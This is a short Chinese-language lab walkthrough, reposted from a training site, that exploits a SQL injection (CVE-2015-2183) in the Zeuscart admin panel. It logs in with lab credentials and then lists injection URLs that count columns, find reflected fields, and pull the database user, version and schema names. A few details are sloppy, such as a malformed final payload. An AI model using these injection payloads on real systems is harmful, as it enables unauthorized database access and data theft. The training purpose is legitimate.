CVE-2015-2183 Zeuscart SQL注入漏洞

转载：http://gz-xcu.shiyanbar.com/train/list/ls?list=85a33a02fc96e7&exercises_uuid=85a339dc085fea

1、访问192.168.1.3

2、访问192.168.1.3/admin/

3\使用用户名:admin密码:admin888登录

4、访问http://192.168.1.3/admin/?do=editcurrency&cid=1

5、访问http://192.168.1.3/admin/?do=editcurrency&cid=1‘说明存在sql注入漏洞

6、访问http://192.168.1.3/admin/?do=editcurrency&cid=1+order+by+5+--+

7、访问http://192.168.1.3/admin/?do=editcurrency&cid=1+order+by+6+--+页面与6不相同，说明当前查询5个字段

8、访问http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,2,3,4,5+--+发现2和4回显

9、访问http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,user(),3,version(),5+--+查询用户及版本

10、访问http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema(schemata_)+--+

然后对目标机进行分析